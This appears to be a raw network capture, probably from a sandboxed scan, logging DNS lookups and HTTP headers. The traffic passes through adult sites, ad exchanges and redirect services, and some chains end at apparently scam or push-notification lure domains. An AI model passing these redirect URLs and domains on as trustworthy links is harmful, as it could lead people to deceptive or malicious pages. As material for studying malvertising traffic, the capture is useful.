Set-Cookie: tpp_oc=103109%3B1631008526; expires=Wed, 08-Sep-2021 09:55:26 GMT; path=/
Location: http://www.signupandturnyourscreenoffsafepowernow.date/zzz?yqsp=u5ARjqQKdv6zke0GG7LdkA0khF8jfuCy4l_DA5qciZZqkzFRtE4gGnbdZCQdGFK5uMDFI_ZNQiA7WvdcbQk0pA..&sid=&subid=103109_8a80226880cebfbea238877254a4ef4d
-
DNSonsanothi.bizRequestonsanothi.bizIN AResponseonsanothi.bizIN A52.222.139.93onsanothi.bizIN A52.222.139.108onsanothi.bizIN A52.222.139.29onsanothi.bizIN A52.222.139.9
-
GEThttp://alfad.pro/ad/ad?p=266933&w=628726&t=fa3dc9c3c60e9be9&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=628726&t=fa3dc9c3c60e9be9&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/628726
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:55:26 GMT
Location: https://adstook.com/adv.php?campid=345997&cid=101319847592&siteid=628726&cc=NL&cat=Adult&os=OS X&bid=0.00021&conn=WiFi&dev=desktop&browser=Chrome&carrier=
Server: nginx
Content-Length: 0
Connection: keep-alive
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A172.67.192.135nsparket.topIN A104.21.52.2
-
DNSsexy-wife.comRequestsexy-wife.comIN AResponsesexy-wife.comIN A167.86.103.60
-
DNSidaohang.xyzRequestidaohang.xyzIN AResponseidaohang.xyzIN A167.86.103.60
-
DNSxxnxx.clubRequestxxnxx.clubIN AResponsexxnxx.clubIN A167.86.121.34
-
DNSelevisions.bizRequestelevisions.bizIN AResponseelevisions.bizIN A65.9.73.69elevisions.bizIN A65.9.73.21elevisions.bizIN A65.9.73.41elevisions.bizIN A65.9.73.56
-
GEThttp://hornytit.us/index.htmRequestGET /index.htm HTTP/1.1
Host: hornytit.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:26 GMT
Content-Type: text/html
Content-Length: 282
Last-Modified: Tue, 13 Apr 2021 07:57:56 GMT
Connection: keep-alive
ETag: "60754f04-11a"
Accept-Ranges: bytes
-
GEThttp://xxnxx.club/index.htmlRequestGET /index.html HTTP/1.1
Host: xxnxx.club
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:26 GMT
Content-Type: text/html
Last-Modified: Wed, 18 Aug 2021 06:03:48 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"611ca2c4-6cf"
Content-Encoding: gzip
-
GEThttp://idaohang.xyz/adv.htmlRequestGET /adv.html HTTP/1.1
Host: idaohang.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:26 GMT
Content-Type: text/html
Content-Length: 90
Last-Modified: Sun, 22 Aug 2021 13:19:59 GMT
Connection: keep-alive
ETag: "61224eff-5a"
Accept-Ranges: bytes
-
GEThttp://elevisions.biz/redirect?tid=931653RequestGET /redirect?tid=931653 HTTP/1.1
Host: elevisions.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://javsex.us/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csu=2a4ff21e-9e12-4b12-8c28-e1da148494a2
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:55:26 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
Location: http://s.optnx.com/cimp.php?data=TVRZek1Ea3lNakV5Tm53MFlXUXhNVFE0TVdabE16YzFNbVkzTkdVME56RmtOakpoWTJFek5tSmlaUS0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1qYXZzZXgsdXMsaW5kZXgsaHRtJnNpdGVpZD04MTYyNjEmY2FtcGlkPTQ1NzAwMDYmY2F0aWQ9NTA4JmNvdW50cnk9VVNBJmZvcm1hdD0mY29zdD0wLjAwMDUmdGFnPW9vZE5WVEhYTkhaTkhWTTQ1YzNVVldWMHpUT3F0dW11bG1wZEs1MVV0cnFablR1bXFkSzZWMHJxcmJYU3VsZEs2WjBycFhTdWxkTTZWMHJwWGJYVFR6MWI3YTBiWjAyNlhWVnkxWnpaeTAwV1RWMFdUdXQxcDJybG1vc3IwMnI0cHJvMmw0NDI0enQwbHN1NDN1ZGRSTlhWUTd6TkJkMVJuSzV6cFhTdWxkUmM2VjBycFhTdWxjSDJ8aHR0cHwxNTQuNjEuNzEuNTF8VVNBfDQxfGFkLW1hdmVuLmNvbXw1MzEyOTR8NDMwNjc1fDgxNjI2MXwzNTc2NDExfDUwOHw0NTcwMDA2fDU4OTE5MDE0fDE1fDJ8MHwwfDU4OHw5MzE2NTN8NTB8NzV8VVNEfFVTRHwxfDF8MjJ8fDF8VVNBfHwxMHw0fDB8fGQ5MTIyNWVkYzNkYTQ4Yjk1NjA1YTFhMDQzNzE2MzcyfDhjNGQ2MDEzNzZiZDZmNDYzZDBmZmRmYThiMDc5ZmU5fDF8MHxqYXZzZXgudXN8MHwwfDB8MC4xfDF8MHxleGNoYW5nZV9saW5rfDB8MHwwfC0xfDB8MHx8fDJ8NzIwfHwwfDB8MHwzOXwwfDB8MXwwfE9LfDZkNTZjMGI1YWI3MjdmNDZkYTJmZTA3NzdmNGI5Y2Mw
X-Cache: Miss from cloudfront
Via: 1.1 bdbb0d922c29917c00cfed799f55e7c2.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS1-C1
X-Amz-Cf-Id: OFcfIJtzWZxH7-aX7nGAvNTVbHpu0QBqvJTcLhqQozmgPkHh25xcuA==
-
GEThttp://onsanothi.biz/redirect?tid=928662RequestGET /redirect?tid=928662 HTTP/1.1
Host: onsanothi.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://jpteen.us/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
GEThttp://momass.xyz/trade/dt.phpRequestGET /trade/dt.php HTTP/1.1
Host: momass.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSxxxlist.vipRequestxxxlist.vipIN AResponsexxxlist.vipIN A45.77.50.209
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
GEThttp://xxxlist.vip/index.htmlRequestGET /index.html HTTP/1.1
Host: xxxlist.vip
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:26 GMT
Content-Type: text/html
Content-Length: 276
Last-Modified: Tue, 15 Jun 2021 06:51:19 GMT
Connection: keep-alive
ETag: "60c84de7-114"
Accept-Ranges: bytes
-
GEThttp://alfad.pro/ad/ad?p=266933&w=628927&t=c68959760f79cfb0&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=628927&t=c68959760f79cfb0&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/628927
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:55:26 GMT
Location: http://clk.rtpdn14.com/click?i=u8c3Dk0gJWk_0#pc171003
Server: nginx
Content-Length: 0
Connection: keep-alive
-
DNSsync.mathtag.comRequestsync.mathtag.comIN AResponsesync.mathtag.comIN CNAMEpixel-origin.mathtag.compixel-origin.mathtag.comIN A185.29.134.248pixel-origin.mathtag.comIN A185.29.134.244pixel-origin.mathtag.comIN A185.29.132.245pixel-origin.mathtag.comIN A185.29.132.241
-
DNSsecure.adnxs.comRequestsecure.adnxs.comIN AResponsesecure.adnxs.comIN CNAMEg.geogslb.comg.geogslb.comIN CNAMEib.anycast.adnxs.comib.anycast.adnxs.comIN A37.252.172.37ib.anycast.adnxs.comIN A37.252.173.22ib.anycast.adnxs.comIN A37.252.172.45ib.anycast.adnxs.comIN A37.252.173.27ib.anycast.adnxs.comIN A37.252.172.36ib.anycast.adnxs.comIN A37.252.173.38ib.anycast.adnxs.comIN A37.252.172.250ib.anycast.adnxs.comIN A37.252.172.249
-
DNSdmx.districtm.ioRequestdmx.districtm.ioIN AResponsedmx.districtm.ioIN A104.16.68.69dmx.districtm.ioIN A104.16.190.66
-
DNScm.g.doubleclick.netRequestcm.g.doubleclick.netIN AResponsecm.g.doubleclick.netIN A142.251.36.34
-
DNSpixel-sync.sitescout.comRequestpixel-sync.sitescout.comIN AResponsepixel-sync.sitescout.comIN CNAMEpixel-a.sitescout.compixel-a.sitescout.comIN A66.155.71.149
-
DNScreativecdn.comRequestcreativecdn.comIN AResponsecreativecdn.comIN A185.184.8.65
-
DNSads.pubmatic.comRequestads.pubmatic.comIN AResponseads.pubmatic.comIN CNAMEpubmatic.edgekey.netpubmatic.edgekey.netIN CNAMEe6603.g.akamaiedge.nete6603.g.akamaiedge.netIN A2.18.97.238
-
DNSeus.rubiconproject.comRequesteus.rubiconproject.comIN AResponseeus.rubiconproject.comIN CNAMEeus.rubiconproject.com.edgekey.neteus.rubiconproject.com.edgekey.netIN CNAMEe8960.b.akamaiedge.nete8960.b.akamaiedge.netIN A104.126.125.209
-
DNSsecure.adnxs.comRequestsecure.adnxs.comIN AResponsesecure.adnxs.comIN CNAMEg.geogslb.comg.geogslb.comIN CNAMEib.anycast.adnxs.comib.anycast.adnxs.comIN A185.33.223.38ib.anycast.adnxs.comIN A185.33.220.240ib.anycast.adnxs.comIN A185.33.220.241ib.anycast.adnxs.comIN A185.33.221.87ib.anycast.adnxs.comIN A185.33.221.15ib.anycast.adnxs.comIN A185.33.223.178ib.anycast.adnxs.comIN A185.33.221.14ib.anycast.adnxs.comIN A185.33.220.244
-
DNSsync.1rx.ioRequestsync.1rx.ioIN AResponsesync.1rx.ioIN A199.127.204.142
-
DNSx.bidswitch.netRequestx.bidswitch.netIN AResponsex.bidswitch.netIN CNAMEalb-aws-fr-bswx-3-1125904451.eu-central-1.elb.amazonaws.comalb-aws-fr-bswx-3-1125904451.eu-central-1.elb.amazonaws.comIN A18.184.223.197alb-aws-fr-bswx-3-1125904451.eu-central-1.elb.amazonaws.comIN A18.192.44.206alb-aws-fr-bswx-3-1125904451.eu-central-1.elb.amazonaws.comIN A35.157.0.85alb-aws-fr-bswx-3-1125904451.eu-central-1.elb.amazonaws.comIN A18.185.140.232alb-aws-fr-bswx-3-1125904451.eu-central-1.elb.amazonaws.comIN A3.64.144.49alb-aws-fr-bswx-3-1125904451.eu-central-1.elb.amazonaws.comIN A35.157.197.70alb-aws-fr-bswx-3-1125904451.eu-central-1.elb.amazonaws.comIN A3.69.77.40alb-aws-fr-bswx-3-1125904451.eu-central-1.elb.amazonaws.comIN A52.28.167.107
-
DNSssc-cms.33across.comRequestssc-cms.33across.comIN AResponsessc-cms.33across.comIN CNAMEpixel.33across.compixel.33across.comIN A208.100.17.180
-
DNScs.emxdgt.comRequestcs.emxdgt.comIN AResponsecs.emxdgt.comIN A3.86.192.220cs.emxdgt.comIN A54.208.15.78cs.emxdgt.comIN A18.234.188.235
-
DNSp.rfihub.comRequestp.rfihub.comIN AResponsep.rfihub.comIN CNAMEa.rfihub.coma.rfihub.comIN CNAMEa.rfihub.com.akadns.neta.rfihub.com.akadns.netIN CNAMEa-emea.rfihub.com.akadns.neta-emea.rfihub.com.akadns.netIN A193.0.160.129
-
DNSc1.adform.netRequestc1.adform.netIN AResponsec1.adform.netIN CNAMEtrack.adformnet.akadns.nettrack.adformnet.akadns.netIN A37.157.4.40track.adformnet.akadns.netIN A37.157.4.29track.adformnet.akadns.netIN A37.157.6.251track.adformnet.akadns.netIN A37.157.3.28track.adformnet.akadns.netIN A37.157.6.245track.adformnet.akadns.netIN A37.157.2.234track.adformnet.akadns.netIN A37.157.2.235track.adformnet.akadns.netIN A37.157.4.39
-
DNSeus.rubiconproject.comRequesteus.rubiconproject.comIN AResponseeus.rubiconproject.comIN CNAMEeus.rubiconproject.com.edgekey.neteus.rubiconproject.com.edgekey.netIN CNAMEe8960.b.akamaiedge.nete8960.b.akamaiedge.netIN A104.126.125.209
-
DNSx.bidswitch.netRequestx.bidswitch.netIN AResponsex.bidswitch.netIN CNAMEalb-aws-fr-bswx-1-445786803.eu-central-1.elb.amazonaws.comalb-aws-fr-bswx-1-445786803.eu-central-1.elb.amazonaws.comIN A18.194.108.131alb-aws-fr-bswx-1-445786803.eu-central-1.elb.amazonaws.comIN A3.123.176.85alb-aws-fr-bswx-1-445786803.eu-central-1.elb.amazonaws.comIN A3.124.93.74alb-aws-fr-bswx-1-445786803.eu-central-1.elb.amazonaws.comIN A52.58.182.33alb-aws-fr-bswx-1-445786803.eu-central-1.elb.amazonaws.comIN A18.194.49.211alb-aws-fr-bswx-1-445786803.eu-central-1.elb.amazonaws.comIN A18.198.142.61alb-aws-fr-bswx-1-445786803.eu-central-1.elb.amazonaws.comIN A35.156.40.93alb-aws-fr-bswx-1-445786803.eu-central-1.elb.amazonaws.comIN A35.156.2.114
-
DNSdsum-sec.casalemedia.comRequestdsum-sec.casalemedia.comIN AResponsedsum-sec.casalemedia.comIN CNAMEdsum-sec.casalemedia.com.edgekey.netdsum-sec.casalemedia.com.edgekey.netIN CNAMEe8037.g.akamaiedge.nete8037.g.akamaiedge.netIN A2.18.99.184
-
DNSsecure.adnxs.comRequestsecure.adnxs.comIN AResponsesecure.adnxs.comIN CNAMEg.geogslb.comg.geogslb.comIN CNAMEib.anycast.adnxs.comib.anycast.adnxs.comIN A37.252.173.62ib.anycast.adnxs.comIN A37.252.173.22ib.anycast.adnxs.comIN A37.252.172.45ib.anycast.adnxs.comIN A37.252.172.37ib.anycast.adnxs.comIN A37.252.172.250ib.anycast.adnxs.comIN A37.252.173.38ib.anycast.adnxs.comIN A37.252.172.249ib.anycast.adnxs.comIN A37.252.172.38
-
DNSeb2.3lift.comRequesteb2.3lift.comIN AResponseeb2.3lift.comIN CNAMEeu-eb2.3lift.comeu-eb2.3lift.comIN A76.223.111.18eu-eb2.3lift.comIN A13.248.245.213
-
DNScm.g.doubleclick.netRequestcm.g.doubleclick.netIN AResponsecm.g.doubleclick.netIN A142.250.179.130
-
DNSlangke.fr.amRequestlangke.fr.amIN AResponselangke.fr.amIN A212.107.18.203
-
DNSlogger007.cam4.comRequestlogger007.cam4.comIN AResponselogger007.cam4.comIN A184.94.152.23
-
DNShubporn.usRequesthubporn.usIN AResponsehubporn.usIN A207.180.237.38
-
GEThttp://hubporn.us/goadv.phpRequestGET /goadv.php HTTP/1.1
Host: hubporn.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.1; ZTE BLADE A110 Build/LMY47D) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.123 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSdis.criteo.comRequestdis.criteo.comIN AResponsedis.criteo.comIN CNAMEwidget.par.vip.prod.criteo.comwidget.par.vip.prod.criteo.comIN A178.250.0.163
-
DNSefreecode.comRequestefreecode.comIN AResponseefreecode.comIN A18.208.5.78
-
DNSbefuck.ruRequestbefuck.ruIN AResponsebefuck.ruIN A167.86.103.60
-
DNSd5p.de17a.comRequestd5p.de17a.comIN AResponsed5p.de17a.comIN A213.155.156.183d5p.de17a.comIN A213.155.156.180d5p.de17a.comIN A213.155.156.164d5p.de17a.comIN A213.155.156.165d5p.de17a.comIN A213.155.156.166d5p.de17a.comIN A213.155.156.168d5p.de17a.comIN A213.155.156.169d5p.de17a.comIN A213.155.156.167d5p.de17a.comIN A213.155.156.181d5p.de17a.comIN A213.155.156.182d5p.de17a.comIN A213.155.156.185d5p.de17a.comIN A213.155.156.184
-
DNSyaode.liveRequestyaode.liveIN AResponseyaode.liveIN A212.107.18.203
-
DNSjptube.usRequestjptube.usIN AResponsejptube.usIN A167.86.121.34
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSeus.rubiconproject.comRequesteus.rubiconproject.comIN AResponseeus.rubiconproject.comIN CNAMEeus.rubiconproject.com.edgekey.neteus.rubiconproject.com.edgekey.netIN CNAMEe8960.b.akamaiedge.nete8960.b.akamaiedge.netIN A104.126.125.209
-
DNSlthampio.topRequestlthampio.topIN AResponselthampio.topIN A65.9.73.51lthampio.topIN A65.9.73.111lthampio.topIN A65.9.73.24lthampio.topIN A65.9.73.27
-
DNS789ff.ruRequest789ff.ruIN AResponse789ff.ruIN A104.21.31.100789ff.ruIN A172.67.176.50
-
DNSmatch.adsrvr.orgRequestmatch.adsrvr.orgIN AResponsematch.adsrvr.orgIN CNAMEmatch-aga.adsrvr.orgmatch-aga.adsrvr.orgIN CNAMEa97adde81b00f2ca4.awsglobalaccelerator.coma97adde81b00f2ca4.awsglobalaccelerator.comIN A13.248.242.197a97adde81b00f2ca4.awsglobalaccelerator.comIN A76.223.111.131
-
DNSyesdd.liveRequestyesdd.liveIN AResponseyesdd.liveIN A212.107.18.203
-
GEThttp://alfad.pro/go/266933/626195RequestGET /go/266933/626195 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:55:39 GMT
Server: nginx
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive
-
DNScm.g.doubleclick.netRequestcm.g.doubleclick.netIN AResponsecm.g.doubleclick.netIN A142.250.179.130
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSyaojav.comRequestyaojav.comIN AResponseyaojav.comIN A104.21.52.235yaojav.comIN A172.67.205.115
-
DNSdjnaivalj34ub.cloudfront.netRequestdjnaivalj34ub.cloudfront.netIN AResponsedjnaivalj34ub.cloudfront.netIN A13.227.211.31djnaivalj34ub.cloudfront.netIN A13.227.211.125djnaivalj34ub.cloudfront.netIN A13.227.211.116djnaivalj34ub.cloudfront.netIN A13.227.211.92
-
DNSbaide.liveRequestbaide.liveIN AResponsebaide.liveIN A212.107.18.203
-
GEThttp://alfad.pro/go/266933/627599RequestGET /go/266933/627599 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:55:39 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 269
Connection: keep-alive
-
DNSjpav.usRequestjpav.usIN AResponsejpav.usIN A167.86.121.34
-
DNSsexy4.xnxxn.ruRequestsexy4.xnxxn.ruIN AResponsesexy4.xnxxn.ruIN A2.57.89.186
-
DNSjs.wpadmngr.comRequestjs.wpadmngr.comIN AResponsejs.wpadmngr.comIN CNAMEcdn28786515.ahacdn.mecdn28786515.ahacdn.meIN A213.174.135.24cdn28786515.ahacdn.meIN A213.174.135.25
-
GEThttp://befuck.ru/ad.phpRequestGET /ad.php HTTP/1.1
Host: befuck.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSxml.bid-engine.comRequestxml.bid-engine.comIN AResponsexml.bid-engine.comIN CNAMEad-maven.xml.ak-is2.netad-maven.xml.ak-is2.netIN A198.134.116.29
-
DNSwww.onlinecasinoground.nlRequestwww.onlinecasinoground.nlIN AResponsewww.onlinecasinoground.nlIN A104.26.1.78www.onlinecasinoground.nlIN A104.26.0.78www.onlinecasinoground.nlIN A172.67.72.99
-
GEThttp://jptube.us/index.htmlRequestGET /index.html HTTP/1.1
Host: jptube.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:39 GMT
Content-Type: text/html
Content-Length: 265
Last-Modified: Tue, 22 Jun 2021 05:10:57 GMT
Connection: keep-alive
ETag: "60d170e1-109"
Accept-Ranges: bytes
-
DNSxu2.comRequestxu2.comIN AResponsexu2.comIN A35.209.6.106
-
DNSxml.bid-engine.comRequestxml.bid-engine.comIN AResponsexml.bid-engine.comIN CNAMEad-maven.xml.ak-is2.netad-maven.xml.ak-is2.netIN A198.134.116.29
-
DNSteentube.usRequestteentube.usIN AResponseteentube.usIN A167.86.121.34
-
DNSretributionsaloon.xyzRequestretributionsaloon.xyzIN AResponseretributionsaloon.xyzIN A34.196.13.28
-
DNS789ff.liveRequest789ff.liveIN AResponse789ff.liveIN A212.107.18.203
-
DNSbaide.liveRequestbaide.liveIN AResponsebaide.liveIN A212.107.18.203
-
DNSmillustry.topRequestmillustry.topIN AResponsemillustry.topIN A13.227.222.110millustry.topIN A13.227.222.89millustry.topIN A13.227.222.102millustry.topIN A13.227.222.73
-
GEThttp://yaojav.com/adv.htmlRequestGET /adv.html HTTP/1.1
Host: yaojav.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:55:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
last-modified: Thu, 05 Aug 2021 16:10:29 GMT
vary: Accept-Encoding
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JZutMztoeWzGmETnL6Z1a%2Fqco67ybxWzilONxD6Hp6vtvZwz3ILkBsbWJ4xKUVlRCY%2BYnamlOVcxy7OuaHsVaimtA%2FNlQDAuD5T0w%2BM5oVdUuCyo%2FFoXUmy%2FX0zc"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6d2a8cc2dd8d1-AMS
Content-Encoding: gzip
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
DNSnkwintenc.bizRequestnkwintenc.bizIN AResponsenkwintenc.bizIN A65.9.73.46nkwintenc.bizIN A65.9.73.60nkwintenc.bizIN A65.9.73.61nkwintenc.bizIN A65.9.73.49
-
GEThttp://jpav.us/index.htmlRequestGET /index.html HTTP/1.1
Host: jpav.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-J120FN Build/LMY47X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/56.0.2924.87 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:39 GMT
Content-Type: text/html
Content-Length: 264
Last-Modified: Thu, 26 Aug 2021 08:30:28 GMT
Connection: keep-alive
ETag: "61275124-108"
Accept-Ranges: bytes
-
GEThttp://lthampio.top/redirect?tid=917723RequestGET /redirect?tid=917723 HTTP/1.1
Host: lthampio.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
